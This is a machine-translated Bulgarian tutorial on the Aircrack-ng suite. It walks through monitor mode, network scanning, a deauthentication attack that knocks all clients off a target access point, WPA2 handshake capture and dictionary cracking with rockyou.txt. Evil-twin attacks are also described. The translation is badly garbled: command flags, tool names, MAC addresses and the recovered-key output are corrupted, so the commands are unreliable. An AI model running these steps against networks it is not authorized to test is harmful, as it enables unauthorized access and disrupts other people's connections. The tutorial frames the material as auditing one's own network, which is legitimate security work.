Как да използвате Aircrack-ng

How Use Aircrack Ng



През повечето време хората никога не мислят за мрежата, към която са свързани. Те никога не си мислят колко защитена е тази мрежа и колко рискуват ежедневно поверителните си данни. Можете да проверявате уязвимости във вашите wifi мрежи, като използвате много мощен инструмент, наречен Aircrack-ng и Wireshark. Wireshark се използва за наблюдение на мрежовата активност. Aircrack-ng е по -скоро като агресивен инструмент, който ви позволява да хакнете и да дадете достъп до безжични връзки. Мисленето като натрапник винаги е било най -сигурният начин да се предпазите от хакване. Може да успеете да схванете точните действия, които един нарушител ще предприеме, за да получи достъп до вашата система, като научи за самолета. След това можете да проверите съответствието на собствената си система, за да сте сигурни, че тя не е несигурна.

Aircrack-ng е пълен набор от софтуер, предназначен за тестване на сигурността на WiFi мрежата. Това не е просто един инструмент, а колекция от инструменти, всеки от които изпълнява определена цел. Може да се работи по различни области на сигурността на wifi, като наблюдение на точката за достъп, тестване, атака на мрежата, разбиване на wifi мрежата и тестване. Основната цел на Aircrack е да прихване пакетите и да дешифрира хешовете, за да разбие паролите. Той поддържа почти всички нови безжични интерфейси. Aircrack-ng е подобрена версия на остарял набор от инструменти Aircrack, ng се отнася до Нова генерация . Някои от страхотните инструменти, които работят заедно за по -голяма задача.







Airmon:

Airmon-ng е включен в комплекта aircrack-ng, който поставя картата на мрежовия интерфейс в режим на монитор. Мрежовите карти обикновено приемат само пакети, насочени към тях, както е определено от MAC адреса на NIC, но с airmon-ng всички безжични пакети, независимо дали са насочени към тях или не, също ще бъдат приети. Трябва да можете да улавяте тези пакети, без да се свързвате или удостоверявате с точката за достъп. Използва се за проверка на състоянието на точка за достъп чрез поставяне на мрежовия интерфейс в режим на наблюдение. Първо трябва да конфигурирате безжичните карти, за да включите режима на монитора, след това да убиете всички фонови процеси, ако смятате, че някой процес им пречи. След прекратяване на процесите, режимът на монитор може да бъде активиран на безжичния интерфейс, като изпълните командата по -долу:



[защитен имейл]: ~ $sudoairmon-ng start wlan0#

Можете също да деактивирате режима на монитора, като спрете airmon-ng по всяко време, като използвате командата по-долу:

[защитен имейл]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng се използва за изброяване на всички мрежи около нас и за преглед на ценна информация за тях. Основната функционалност на airodump-ng е да подсмърча пакети, така че по същество е програмиран да вземе всички пакети около нас, докато е в режим на монитор. Ще го стартираме срещу всички връзки около нас и ще събираме данни като броя на клиентите, свързани към мрежата, съответните им mac адреси, стила на шифроване и имената на каналите и след това ще започнем да насочваме към целевата си мрежа.

Като въведем командата airodump-ng и му дадем името на мрежовия интерфейс като параметър, можем да активираме този инструмент. Той ще изброи всички точки за достъп, количеството пакети данни, използваните методи за криптиране и удостоверяване и името на мрежата (ESSID). От гледна точка на хакерството, mac адресите са най -важните полета.

[защитен имейл]: ~ $sudoairodump-ng wlx0mon

Самолет:

Aircrack се използва за проникване на парола. След улавяне на всички пакети с помощта на airodump, можем да разбием ключа чрез самолет. Той разбива тези ключове, като използва два метода PTW и FMS. PTW подходът се извършва на две фази. Отначало се използват само ARP пакети и едва след това, ако ключът не е напукан след търсенето, той използва всички останали заснети пакети. Плюс на подхода PTW е, че не всички пакети се използват за крекинг. Във втория подход, т.е. FMS, ние използваме както статистическите модели, така и алгоритмите за груба сила за разбиване на ключа. Може да се използва и речников метод.

Въздушно игра:

Airplay-ng въвежда пакети в безжична мрежа за създаване или ускоряване на трафика. Пакети от два различни източника могат да бъдат уловени чрез aireplay-ng. Първият е мрежата на живо, а вторият е пакетите от вече съществуващия pcap файл. Airplay-ng е полезен по време на атака за деавтентификация, насочена към безжична точка за достъп и потребител. Освен това можете да извършите някои атаки като атака с кафе лате с airplay-ng, инструмент, който ви позволява да получите ключ от системата на клиента. Можете да постигнете това, като хванете ARP пакет и след това го манипулирате и изпратите обратно в системата. След това клиентът ще създаде пакет, който може да бъде уловен от airodump и самолетът взривява ключа от този модифициран пакет. Някои други опции за атака на airplay-ng включват chopchop, фрагменти arepreplay и т.н.

Въздушна база:

Airbase-ng се използва за трансформиране на компютъра на натрапник в компрометирана точка за връзка, с която другите да се свързват. Използвайки Airbase-ng, можете да претендирате, че сте законна точка за достъп и да извършвате атаки от типа „човек в средата“ на компютри, които са свързани към вашата мрежа. Този вид атаки се наричат ​​Evil Twin Attacks. За основните потребители е невъзможно да различават между законна точка за достъп и фалшива точка за достъп. Така че злата двойна заплаха е сред най -заплашителните безжични заплахи, с които се сблъскваме днес.

Airolib-ng:

Airolib ускорява процеса на хакерство, като съхранява и управлява списъците с пароли и точката за достъп. Системата за управление на бази данни, използвана от тази програма, е SQLite3, която е достъпна предимно на всички платформи. Разбиването на парола включва изчисляването на двойния главен ключ, чрез който се извлича частният преходен ключ (PTK). С помощта на PTK можете да определите идентификационния код на рамковото съобщение (MIC) за даден пакет и теоретично да откриете, че MIC е подобен на пакета, така че ако PTK е прав, PMK също е прав.

За да видите списъците с пароли и мрежите за достъп, съхранявани в базата данни, въведете следната команда:

[защитен имейл]: ~ $sudoairolib-ng testdatabase –stats

Тук testdatabase е db, до който искате да получите достъп или да създадете, а –stats е операцията, която искате да извършите върху него. Можете да извършвате множество операции с полетата на базата данни, като например да давате максимален приоритет на някакъв SSID или нещо подобно. За да използвате airolib-ng с aircrack-ng, въведете следната команда:

[защитен имейл]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Тук използваме вече изчислените PMK, съхранявани в тестова база данни за ускоряване на процеса на проникване на парола.

Разбиване на WPA/WPA2 с помощта на Aircrack-ng:

Нека да разгледаме малък пример за това, което aircrack-ng може да направи с помощта на няколко от своите страхотни инструменти. Ще разбием предварително споделения ключ на WPA/WPA2 мрежа, използвайки речников метод.

Първото нещо, което трябва да направим, е да изброим мрежовите интерфейси, които поддържат режим на монитор. Това може да стане с помощта на следната команда:

[защитен имейл]: ~ $sudoairmon-ng

Чипсет драйвер за интерфейс PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Можем да видим интерфейс; сега трябва да поставим мрежовия интерфейс, който открихме (wlx0) в режим на наблюдение, като използваме следната команда:

[защитен имейл]: ~ $sudoairmon-ng start wlx0

Той е активирал режим на монитор на интерфейса, наречен wlx0mon .

Сега трябва да започнем да слушаме предавания от близки рутери чрез нашия мрежов интерфейс, който сме поставили в режим на мониторинг.

[защитен имейл]: ~ $sudoairodump-ng wlx0mon

CH5 ][Изминало:30с][ 2020 г.-12-02 00:17



BSSID PWR маяци#Данни, #/s CH MB ENC CIPHER AUTH ESSID



E4:6F:13: 04: CE:31 -Четири пет 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:БЪДА-63 77 0 0 654д. WPA2 CCMP PSK Hackme

C8: 3A:35:A0:4E:01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: ДАВА:88: FA:38: 02-68 28 2 0 единадесет54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Sond Lost Frames Sonda



E4:6F:13: 04: CE:315C: 3A:Четири пет: D7: EA: 8B -3 0- 1д8 5

E4:6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4:6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4:6F:13: 04: CE:31Пр.н.е.:91: B5: F8: 7E: D5 -390д-1 1002 13

Нашата целева мрежа е Кракит в този случай, който в момента се изпълнява на канал 1.

Тук, за да разбием паролата на целевата мрежа, трябва да уловим 4-посочно ръкостискане, което се случва, когато устройство се опитва да се свърже с мрежа. Можем да го заснемем, като използваме следната команда:

[защитен имейл]: ~ $sudoairodump-ng-° С 1--bssid E4:6F:13: 04: CE:31 /домашен wlx0

-° С : Канал

–Bss : Bssid на целевата мрежа

: Името на директорията, където ще бъде поставен pcap файлът

Сега трябва да изчакаме устройство да се свърже с мрежата, но има по -добър начин за улавяне на ръкостискане. Можем да премахнем автентичността на устройствата в AP, като използваме атака за деавтентификация, като използваме следната команда:

[защитен имейл]: ~ $sudoaireplay-ng-0 -да сеE4:6F:13: 04: CE:31

да се : Bssid на целевата мрежа

-0 : атака за деавтентификация

Изключихме всички устройства и сега трябва да изчакаме устройство да се свърже с мрежата.

CH1 ][Изминало:30с][ 2020 г.-12-02 00:02][WPA handshake: E4:6F:13: 04: CE:31



BSSID PWR RXQ маяци#Данни, #/s CH MB ENC CIPHER AUTH E



E4:6F:13: 04: CE:31 -47 1 228 807 36 154 -ти WPA2 CCMP PSK P



BSSID STATION PWR Rate Sond Lost Frames Sonda



E4:6F:13: 04: CE:31Пр.н.е.:91: B5: F8: 7E: D5 -35 0-1 0 1

E4:6F:13: 04: CE:315C: 3A:Четири пет: D7: EA: 8B -290e- 1e0 22

E4:6F:13: 04: CE:31 88:28:B3:30:27: 7E -310д-1 0 32

E4:6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4:6F:13: 04: CE:31D4:6A:6A:99: ED: E3 -350e- 0e0 86

E4:6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1д0 1

Получихме попадение и като погледнем в горния десен ъгъл точно до часа, можем да видим, че ръкостискането е заснето. Сега погледнете в указаната папка ( /У дома в нашия случай) за а .pcap файл.

За да разбием ключа WPA, можем да използваме следната команда:

[защитен имейл]: ~ $sudoaircrack-ng-a2 rockyou.txt-bE4:6F:13: 04: CE:31ръкостискане. капачка

b: Bssid на целевата мрежа

-a2: Режим WPA2

Rockyou.txt: Речникътфайлизползвани

Ръкостискане. Капачка:файл койтосъдържа заснето ръкостискане

Aircrack-ng1.2бета3

[00:01:49] 10566тествани ключове(1017.96да се/с)

КЛЮЧОВО НАМЕРЕН! [хвана ме]

Главен ключ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fпетдесет° С


Преходен ключ: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FпетдесетC025 62E9 5D71

Ключът към целевата ни мрежа е разбит успешно.

Заключение:

Безжичните мрежи са навсякъде, използвани от всяка компания, от работници, използващи смартфони, до индустриални устройства за управление. Според изследванията, почти над 50 процента от интернет трафика ще бъде през WiFi през 2021 г. Безжичните мрежи имат много предимства, комуникация извън вратите, бърз достъп до интернет на места, където е почти невъзможно да се поставят кабели, може да разшири мрежата, без да инсталира кабели за всеки друг потребител и може лесно да свърже мобилните ви устройства с домашните ви офиси, докато не сте там.

Въпреки тези предимства, има голям въпрос за вашата поверителност и сигурност. Като тези мрежи; в обхвата на предаване рутерите са отворени за всеки, те лесно могат да бъдат атакувани и вашите данни могат лесно да бъдат компрометирани. Например, ако сте свързани с обществен wifi, всеки, свързан с тази мрежа, може лесно да провери мрежовия ви трафик, използвайки известна интелигентност и с помощта на страхотни налични инструменти и дори да го изхвърли.